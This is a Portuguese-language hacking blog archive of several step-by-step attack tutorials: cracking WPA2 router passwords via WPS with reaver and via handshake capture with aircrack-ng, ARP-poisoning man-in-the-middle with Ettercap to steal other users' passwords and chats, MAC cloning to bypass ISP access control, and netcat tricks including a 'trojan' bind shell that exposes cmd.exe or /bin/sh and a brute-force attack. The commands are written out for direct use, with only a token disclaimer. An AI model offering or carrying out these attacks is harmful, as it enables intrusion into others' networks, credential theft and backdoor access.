Mostrando postagens com marcador Wireless Hacking. Mostrar todas as postagens
Mostrando postagens com marcador Wireless Hacking. Mostrar todas as postagens

quinta-feira, 7 de novembro de 2013

Descobrindo senha de Roteadores Wi-Fi WPA2 com WPS Ativado

Olá a todos

Claro que não preciso falar que essas informações devem ser usadas com responsabilidade, apenas para fins de estudo e testes, lembrando que cada um será responsável pelo que fizer com essas informações.

Pra começar precisamos de uma distribuição Linux usada para Pen-Test, no meu caso, fiz e testei com sucesso o Linux Backtrack disponível no seguinte link abaixo

http://www.backtrack-linux.org/downloads/
Atualizado em 24/4/13: A dica apresentada aqui nesse tutorial funciona perfeitamente também no Kali Linux.
Essa distribuição já vem com tudo que precisamos instalado.

Vamos precisar também de uma placa de rede Wi-Fi que suporte ser ativada em modo monitor (a maioria funciona) no computador ou VM que será usada para fazer o procedimento.

Importante é que esse tutorial só funciona em roteadores que tem a função WPS ativada, que diga-se de passagem muitos tem e vem ativado por padrão.

Vamos lá então:

Caso sua placa já esteja conectada abra um terminal e digite
ifconfig wlan0 down
lembrando que “wlan0? pode variar dependendo do seu equipamento.
em seguida vamos colocar a placa em modo monitor com o seguinte comando:
airmon-ng start wlan0
Agora precisamos capturar o MAC do Access Point que desejamos descobrir a senha para isso execute o seguinte comando
airodump-ng -i mon0
Será exibida uma tela como essa onde será visualizado uma lista com todos os access point que foram localizados, copie o mac do access point desejado antes de ir pro próximo passo.

Obs: O campo ESSID vai mostrar o nome das redes ao alcance no caso aqui propositadamente ficaram borrados



Agora vamos usar um programa chamado reaver, ele pode ser instalado em outras distribuições linux mas no nosso sugerido ela já vem instalada, basta digitar o seguinte agora
reaver -i mon0 -b 98:5d:4c:c3:54:90 -vv
Lembre-se de após o “-b” vc deve usar o Mac Adress do access point que deseja descobrir a senha.

O processo é um tanto demorado (pode levar váárias horas) mas se fizer tudo direitinho e o Access Point estiver configurado para usar WPS certamente será exibida a senha no final.


Creditos: Hernane Carvalho

segunda-feira, 28 de maio de 2012

Guia basico do Ettercap

O ettercap um programa classificado com sniffer, pois o mesmo captura dados em uma rede local. Farejadores como são conhecidos os sniffer eles capturam todo trafego da rede, com isso podemos capturar senhas digitadas por outros usuários de nossa rede. Analisando os dados podemos captura conversas de clientes de mensagem do tipo MSN ou outros clientes de mensagem instantânea, podemos ser usando com man-in-the-midler "MITM"(Homem no meio) e etc.

Primeiro passo e instalar o farejador(ettercap).
Ultima versão e 0.7.3 e temos disponível para SO Linux e Windows.

Windows:
http://sourceforge.net/projects/ette...aries/windows/

Linux:
Para distros baseadas no debian/ubuntu:

Citação:
# apt-get install ettercap-gtk
Para outras distribuições, temos que compilar os pacotes.

Citação:
# ./configure
# make
# make install
Vamos iniciar.

Próximo passo e iniciar o ettercap, para linux temos que inicia-lo em modo root, caso contrario não temos como selecionar a interface.



Sniffer > Unified Sniffing

Selecione a interface que está conectada à rede que você quer farejar, clique em"OK".

Host > Scan for hosts.
Na parte inferior da tela, como "Host list , são hosts adicionados" ( Os que estão listados abaixo são os micros que estão on-line na sua rede no momento).



Hosts > Host list
Agora aparecem os IPs das máquinas conectadas, é preciso ter em mente que o roteador também aparece (Lembrando que nosso micro não e mostrado).

Selecione o IP do seu computador para atacar e clique em "Add to Target 1", em seguida, o roteador "Add to Target 2".



Antes de começar o farejamento, e bom lembrar que a técnica usando e chamada de man-in-the-midler(Homem no meio), ai você me pergunta, mas como e isso? todos pacotes que saem do micro alvo, passam por minha maquina antes de chegar ao destino. É possível que a parti de algum tempo usando o MITM o host da vitima fique off por alguns segundos ate que as tabelas ARP sejam resetadas.

Mitm > ARP Poisoning - Agora clique na guia "Sniff remote connections" e clique em "OK"



Start > Start sniffing.



Estamos capturando o trafego de rede.

View > Connections - Aqui podemos ver todas as conexões e clique duas vezes em um pode ver os dados que ele contém, inclusive conversas, os usuários e senhas, etc.

Agora e deixar farejando. Xeque Mate!

Creditos : Bhior.

quinta-feira, 12 de abril de 2012

Como descobrir senha de roteador usando WPA/WPA2



Salve Galera...Estou como novo postador aqui do blog do meu amigo Waldemar ( Bin laden como eu chamo)então vou está postando um tutorial que eu fiz para uma matéria na facu de segurança e resolvi mostrar a invasão em um roteador usando WPA/WPA2 usando o backtrack5 e resolvi compartilhar com vocês tambem
OBS: verifique se sua placa de rede é compativel para fazer todo o procedimento
(lembrando que não vou ensinar o que cada parâmetro o que faz)

Para fazer o processo vamos precisar

- backtrack 5
-wordlist com suporte ao aircrack-ng


primeiramente vamos aos comandos:

Código:
airmon-ng

airmon-ng start wlan0

airodump-ng mon0

airodump-ng -c (canal) -w (file name) --bssid (MAC AP) mon0

airplay-ng -1 0 -a (BSSID) mon0 
aircrack-ng (File directory)

aircrack-ng -w (wordlist directory) (File directory)
Vamos agora passo-a-passo seguindo os códigos acima:


começaremos com os dois primeiros comando:
Código:
airmon-ng
aqui ele vai mostrar o nome da minha placa de rede e dar o nome de wlan0
Código:
airmon-ng start wlan0
após esse comando ele coloca a placa em modo monitor e habilita o nome de mon0



agora vamos ver as redes por perto com o comando:
Código:
airodump-ng mon0

(Podemos ver o BSSID o canal e o MAC ( que vamos chamar de BSSID nos comandos de agora em diante) do roteador...por hora vamos gravar o endereço MAC e o canal)
(Temos que observar que abaixo de STATION existe um endereço MAC que é o de alguem usando a rede...temos que lembrar que precisamos de pelo menos 1 endereço usando a rede, caso contrario não é possivel continuar)

vamos começar a monitorar uma rede especifica e pegar pacotes
Código:
airodump-ng -c (canal) -w (file name) --bssid (MAC AP) mon0
file name é o nome que você vai dar para o arquivo de captura criado com o parâmetro -w..
(nomalmente esse arquivo é criado na pasta root com a extensão .cap)




Agora vamos pedir uma autentificação com o comando
airplay-ng -1 0 -a (BSSID) mon0


como observado acima a autentificação foi aceita..

agora podemos tentar crackear..então usaremos o comando
aircrack-ng (file directory)


se o resultado obtido for "WPA( 1 handshake) você pode continuar...caso ao contrario tente novamente com mais pacotes capturados

para finalizar vamos tentar descrobrir a senha por brute force usando uma wordlist
Código:
aircrack-ng -w (wordlist directory) (File directory)



descoberta a senha que no nosso caso é "password".... é só correr para o abraço



Wordlist usada: Download Wordlist

segunda-feira, 2 de abril de 2012

A-MAC Address Change


Uma boa ferramenta para quem gosta de Wireless Hacking é o bom e velho MAC Address Changer,
Hoje em dia praticamente todos os provedores de acesso wireless liberam o acesso aos seus clientes atáves do seu MAC Address.
Tendo ele em mãos, basta clona-lo.

sexta-feira, 30 de março de 2012

NetCat - O Canivete suiço do TCP/IP


Vamos dar uma olhada nos comandos do netcat, a opção -H exibe as opções do programa. Basta digitar nc -h e dar enter. Veremos os principais comandos do netcat:
l = Coloca uma porta em estado de listenning(escuta)

L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche

P = Define uma porta

V = ativa o recebimento de eco

U = utiliza o protocolo UDP ao invés de TCP

T = para se conectar a TELNET

O = Gera um log em formato hexadecimal

W = Determina um tempo máximo para aguardar uma reposta

E = Redireciona arquivos.

D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.


Bem, agora que já conhecemos os comandos mais usados do netcat vamos a pratica:

Colocando uma porta em escuta:

Nc -l -p 8080 isso faria com que o netcat colocasse a porta 8080 em escuta, note que foi usado -v para que fosse mostrado a saída do programa na tela “listening on [any] 8080 …“, caso a opção -v não fosse inserida este texto não seria mostrado.

Fazendo um Port-Scanner com o netcat:

nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à 6550 mais você também pode selecionar as portas que deseja escanear dando um espaço entre os intervalos de portas a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner nas portas 80, 23, 79 e 25.

Fazendo um trojan com o netcat:

Note que basta redirecionar todo o trafego de uma porta enviando a cmd.exe se for windows e bin/bash.sh se for UNIX a sintaxe é a seguinte em sistemas windows nc -L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.

Fazendo um ataque de brute force com o netcat:

O canivete suíço do TCP/IP tem muitas funções interessante uma delas é o brute force um exemplo: nc -vv 79 < c:\usuarios.txt > c:\log.txt note que você precisara de um arquivos com nome de usuários em c: e todo log será gravado em c:\log.txt para que você possa analisar depois. esse força bruta foi feita em cima da porta 79 FINGER mais poderia ser facilmente adaptada a outras portas.

Fazendo um sniffer com o netcat:
O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma rede basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego na porta 80 acho que nem é mais necessário dizer que podemos também gravar toda saída em um arquivo TXT, mais bem pra você que ainda não sacou a jogada ai vai nc -vv -L 127.0.0.1 -p 80 > c:\sniffer.txt

Autor: Diablos 4-Ever

Fonte: Desconhecida